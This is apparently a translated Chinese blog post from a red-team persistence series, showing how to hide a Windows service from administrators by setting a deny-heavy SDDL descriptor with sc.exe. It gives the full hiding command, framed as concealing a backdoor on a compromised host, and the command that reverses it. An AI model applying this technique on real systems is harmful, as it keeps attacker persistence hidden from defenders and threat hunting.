WEB渗透权限维持篇-隐藏windows服务

往期文章
WEB渗透权限维持篇-DLL注入\劫持-CSDN博客

WEB渗透权限维持篇-CLR-Injection-CSDN博客

WEB渗透权限维持篇-计划任务-CSDN博客

WEB渗透权限维持篇-DLL注入-修改内存中的PE头-CSDN博客

WEB渗透权限维持篇-DLL注入-进程挖空(MitreT1055.012)-CSDN博客

WEB渗透权限维持篇-MSSQL后门-CSDN博客

WEB渗透权限维持篇-禁用Windows事件日志-CSDN博客

WEB渗透权限维持篇-映像劫持-CSDN博客

复制代码
Translate from: https://www.sans.org/blog/red-team-tactics-hiding-windows-services/

Windows的一个功能允许红队或攻击者将服务隐藏起来,从而为逃避基于主机的常见威胁搜寻技术的检测提供了机会。

这里假设Fax服务是我们的恶意文件或后门

打开services.msc可以看到服务

复制代码
执行命令可以看到服务
复制代码
管理员权限下执行以下命令,安全标识符定义语言(SDDL)
复制代码
& $env:SystemRoot\System32\sc.exe sdset SWCUEngine "D:(D;;DCLCWPDTSD;;;IU)(D;;DCLCWPDTSD;;;SU)(D;;DCLCWPDTSD;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)"
复制代码
可以看到已经查询不到了
复制代码
在红队或渗透测试中,这可能是一种有用的技术,可以在受感染主机上保持持久性。重启后,隐藏的服务也会自动启动。
取消隐藏的命令
& $env:SystemRoot\System32\sc.exe sdset SWCUEngine "D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)(A;;  CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)"
相关推荐
路由侠内网穿透2 小时前
本地部署开源视频存档和搜索引擎工具 TubeArchivist 并实现外部访问
服务器·网络·windows·tcp/ip·搜索引擎·开源
想躺平的咸鱼干3 小时前
ollama的下载以及Spring AI Alibaba的ChatModel和ChatClient的流式输出和在idea的实现
windows·https·idea·流式输出·springaialibaba·chatclient·chatmodel
余防3 小时前
bypass--绕Waf
安全·web安全·网络安全
独行soc4 小时前
2025年渗透测试面试题总结-101(题目+回答)
网络·python·安全·web安全·adb·渗透测试·安全狮
咆哮的黑化肥6 小时前
Windows取证
windows
介一安全7 小时前
【APK安全】Android 权限校验核心风险与防御指南
网络安全·安全性测试·apk安全
私人珍藏库7 小时前
[Windows] PDF 专业电子签章工具 v3.3
windows·pdf
lingggggaaaa9 小时前
小迪安全v2023学习笔记(九十五讲)—— 云原生篇&Docker安全&权限环境检测&容器逃逸&特权模式&危险挂载
笔记·学习·安全·web安全·网络安全·docker·云原生
私人珍藏库11 小时前
[Windows] 【2025.09.30更新】PotPlayer_ 64位Public版_v250909(1.7.22619)_精简绿化版
windows·媒体
vortex512 小时前
WebDAV 与 SMB 在钓鱼攻击中的区别
windows·网络安全·渗透测试